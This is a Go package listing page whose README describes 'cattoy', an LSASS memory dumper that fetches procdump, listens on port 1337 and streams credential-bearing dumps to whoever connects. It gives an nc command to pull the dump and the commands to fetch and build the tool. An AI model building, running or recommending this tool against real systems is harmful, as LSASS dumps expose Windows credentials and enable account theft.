cattoy

command module
v0.0.0-...-1bbee25 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Nov 10, 2019 License: BSD-2-Clause Imports: 9 Imported by: 0

README

Cattoy: A LSASS dumper on a stick

Cattoy does the following:
1. Download procdump from sysinternals.
2. Starts a network listener on port 1337.
3. Creates a new dump on incoming connection.
4. Writes the dump out to the connection.

Example:
Once you have Cattoy running, you can run something like:
	; nc $IP 1337 > lsass.dmp
to get a fresh dump from the server

Getting the source:
	go get github.com/majiru/cattoy

Building:
	cd $GOPATH/src/github.com/majiru/cattoy && go build #Make sure to define GOOS if cross compiling

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL